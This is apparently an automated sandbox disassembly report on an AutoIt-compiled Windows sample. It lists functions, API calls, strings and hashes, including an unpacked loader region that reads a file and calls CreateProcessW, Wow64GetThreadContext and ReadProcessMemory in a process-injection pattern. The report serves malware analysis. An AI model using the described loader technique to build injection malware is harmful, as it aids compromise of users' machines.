                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                              • API String ID: 1825951767-3937808951
                                                                              • Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                              • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                              • Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                              • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                                                                              Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                              • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID: <WL$\TL$%I$SL
                                                                              • API String ID: 1986988660-4199584472
                                                                              • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                              • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                              • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                              • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                                                                              Function 00A8A948 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2011 a8a948-a8a9f6 call a88348 2014 a8a9fd-a8aa23 call a8b858 CreateFileW 2011->2014 2017 a8aa2a-a8aa3a 2014->2017 2018 a8aa25 2014->2018 2026 a8aa3c 2017->2026 2027 a8aa41-a8aa5b VirtualAlloc 2017->2027 2019 a8ab75-a8ab79 2018->2019 2020 a8abbb-a8abbe 2019->2020 2021 a8ab7b-a8ab7f 2019->2021 2023 a8abc1-a8abc8 2020->2023 2024 a8ab8b-a8ab8f 2021->2024 2025 a8ab81-a8ab84 2021->2025 2028 a8abca-a8abd5 2023->2028 2029 a8ac1d-a8ac32 2023->2029 2030 a8ab9f-a8aba3 2024->2030 2031 a8ab91-a8ab9b 2024->2031 2025->2024 2026->2019 2032 a8aa5d 2027->2032 2033 a8aa62-a8aa79 ReadFile 2027->2033 2034 a8abd9-a8abe5 2028->2034 2035 a8abd7 2028->2035 2036 a8ac42-a8ac4a 2029->2036 2037 a8ac34-a8ac3f VirtualFree 2029->2037 2038 a8abb3 2030->2038 2039 a8aba5-a8abaf 2030->2039 2031->2030 2032->2019 2040 a8aa7b 2033->2040 2041 a8aa80-a8aac0 VirtualAlloc 2033->2041 2044 a8abf9-a8ac05 2034->2044 2045 a8abe7-a8abf7 2034->2045 2035->2029 2037->2036 2038->2020 2039->2038 2040->2019 2042 a8aac2 2041->2042 2043 a8aac7-a8aae2 call a8baa8 2041->2043 2042->2019 2051 a8aaed-a8aaf7 2043->2051 2048 a8ac12-a8ac18 2044->2048 2049 a8ac07-a8ac10 2044->2049 2047 a8ac1b 2045->2047 2047->2023 2048->2047 2049->2047 2052 a8aaf9-a8ab28 call a8baa8 2051->2052 2053 a8ab2a-a8ab3e call a8b8b8 2051->2053 2052->2051 2059 a8ab40 2053->2059 2060 a8ab42-a8ab46 2053->2060 2059->2019 2061 a8ab48-a8ab4c CloseHandle 2060->2061 2062 a8ab52-a8ab56 2060->2062 2061->2062 2063 a8ab58-a8ab63 VirtualFree 2062->2063 2064 a8ab66-a8ab6f 2062->2064 2063->2064 2064->2014 2064->2019
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A8AA19
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A8AC3F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction ID: 085e7d96a0db3f7d60a8356cdda25af9825dc2c72627091be376ccc1d64f56f0
                                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction Fuzzy Hash: 34A10770E00209EBEB14DFA4C998BAEBBB5BF58304F20815AE505BB280D7759E81CB55
                                                                              Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2142 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                              • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                              • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                              • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                                                                              Function 00A8A6F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2495 a8a6f8-a8a84a call a88348 call a8a5e8 CreateFileW 2502 a8a84c 2495->2502 2503 a8a851-a8a861 2495->2503 2504 a8a901-a8a906 2502->2504 2506 a8a868-a8a882 VirtualAlloc 2503->2506 2507 a8a863 2503->2507 2508 a8a884 2506->2508 2509 a8a886-a8a89d ReadFile 2506->2509 2507->2504 2508->2504 2510 a8a89f 2509->2510 2511 a8a8a1-a8a8db call a8a628 call a895e8 2509->2511 2510->2504 2516 a8a8dd-a8a8f2 call a8a678 2511->2516 2517 a8a8f7-a8a8ff ExitProcess 2511->2517 2516->2517 2517->2504
                                                                              APIs
                                                                                • Part of subcall function 00A8A5E8: Sleep.KERNEL32(000001F4), ref: 00A8A5F9
                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A8A840
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: NAYPPKBZ6A
                                                                              • API String ID: 2694422964-955315063
                                                                              • Opcode ID: 3a1cff76626631442c4a4b339ffdf59a3a52fc96c93eb7c805511a4df0e5d414
                                                                              • Instruction ID: 2f96694428e68a826c53326640bc4a8484b58727c5bd31f36eb69027b42a44bc
                                                                              • Opcode Fuzzy Hash: 3a1cff76626631442c4a4b339ffdf59a3a52fc96c93eb7c805511a4df0e5d414
                                                                              • Instruction Fuzzy Hash: 40518330E14248EBEF10EBF4C855BEEB775EF68700F104159E609BB2C0D6BA5A45CB66
                                                                              Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2519 40407c-404092 2520 404098-4040ad call 407a16 2519->2520 2521 40416f-404173 2519->2521 2524 4040b3-4040d3 call 407bcc 2520->2524 2525 43d3c8-43d3d7 LoadStringW 2520->2525 2528 43d3e2-43d3fa call 407b2e call 406fe3 2524->2528 2529 4040d9-4040dd 2524->2529 2525->2528 2538 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2528->2538 2541 43d400-43d41e call 407cab call 406fe3 call 407cab 2528->2541 2531 4040e3-4040e8 call 407b2e 2529->2531 2532 404174-40417d call 408047 2529->2532 2531->2538 2532->2538 2538->2521 2541->2538
                                                                              APIs
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • _memset.LIBCMT ref: 004040FC
                                                                              • _wcscpy.LIBCMT ref: 00404150
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 3942752672-1585850449
                                                                              • Opcode ID: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                              • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                              • Opcode Fuzzy Hash: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                              • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                              Function 00A895E8 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00A89DA3
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A89E39
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A89E5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                              • Instruction ID: 24ca68a434bfceca250770321b9e1e2c874e68c808d49727a6508d28d78a4986
                                                                              • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                              • Instruction Fuzzy Hash: 9362FB30A146589BEB24DFA4C845BEEB376FF58300F1091A9D10DEB390E7759E81CB5A
                                                                              Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                              • _free.LIBCMT ref: 0043E263
                                                                              • _free.LIBCMT ref: 0043E2AA
                                                                                • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 2861923089-1757145024
                                                                              • Opcode ID: 69c7a8ba5b0d83681772c04a7f4adaaf13fb23c1c272ad725c34919c60715dbb
                                                                              • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                              • Opcode Fuzzy Hash: 69c7a8ba5b0d83681772c04a7f4adaaf13fb23c1c272ad725c34919c60715dbb
                                                                              • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                              Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                              • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                              • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                              • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                              • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                              Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                              • _free.LIBCMT ref: 004696A2
                                                                              • _free.LIBCMT ref: 004696A9
                                                                              • _free.LIBCMT ref: 00469714
                                                                                • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                              • _free.LIBCMT ref: 0046971C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                              • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                              • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                              • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                              Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                              Function 02F1B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointerEx.KERNEL32 ref: 02F1B2BA
                                                                              • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 02F1B2E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: File$PointerWrite
                                                                              • String ID:
                                                                              • API String ID: 539440098-0
                                                                              • Opcode ID: 1e4662a94413fe13f63f89b65bfccb37ae8c25469bc644a4bea468a047790219
                                                                              • Instruction ID: dbb95921b3cc63e508280bcadbda642e3554b7e12be1b08902a80b80d431c288
                                                                              • Opcode Fuzzy Hash: 1e4662a94413fe13f63f89b65bfccb37ae8c25469bc644a4bea468a047790219
                                                                              • Instruction Fuzzy Hash: D831C47190C384DEE7129B25C81872FBFE06F8669CFC8858DF6D486281D3B98418DB53
                                                                              Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID: AU3!P/I$EA06
                                                                              • API String ID: 4104443479-1914660620
                                                                              • Opcode ID: 9495628fedda3bd1ad7133e74fd0af6151b2483e3da426c07c75e57f76189fa4
                                                                              • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                              • Opcode Fuzzy Hash: 9495628fedda3bd1ad7133e74fd0af6151b2483e3da426c07c75e57f76189fa4
                                                                              • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                              Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0043EA39
                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                              Strings
                                                                              Memory Dump Source
